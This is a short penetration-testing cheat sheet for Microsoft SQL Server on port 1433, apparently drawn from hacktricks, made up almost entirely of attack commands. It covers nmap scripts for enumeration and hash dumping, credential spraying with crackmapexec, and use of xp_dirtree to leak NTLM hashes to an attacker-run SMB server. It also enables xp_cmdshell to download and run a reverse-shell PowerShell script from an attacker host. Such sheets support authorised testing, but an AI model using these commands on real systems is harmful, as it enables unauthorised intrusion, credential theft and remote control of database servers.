Pentest - MSSQL - Microsoft SQL Server p 1433
Pentest Microsoft SQL Server
Enumeration
1
|
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
|
Test credentials
1
|
crackmapexec mssql <host> -u users.txt -p passwords.txt
|
Establish connection
impacket-mssqlclient -dc-ip <ip> -windows-auth domain/username:password@host
List DBs
1
|
SELECT name FROM master..sysdatabases;
|
Check permissions
1
2
3
4
|
Use master;
EXEC sp_helprotect 'xp_dirtree';
EXEC sp_helprotect 'xp_subdirs';
EXEC sp_helprotect 'xp_fileexist';
|
xp_dirtree
1
|
EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
|
Use xp_dirtree to obtain NTLM hashes
1
2
3
4
|
#victim
xp_dirtree \\<attacker_ip>\file.txt
#attacker
sudo impacket-smbserver -smb2support share $(pwd)
|
xp_cmdshell
Enable - run command - rev shell
1
2
3
4
|
enable_xp_cmdshell
xp_cmdshell whoami
xp_cmdshell powershell -c iwr http://<ip>/shell.ps1 -o C:\programdata\rev.ps1
xp_cmdshell powershell -c C:\programdata\rev.ps1
|
hacktricks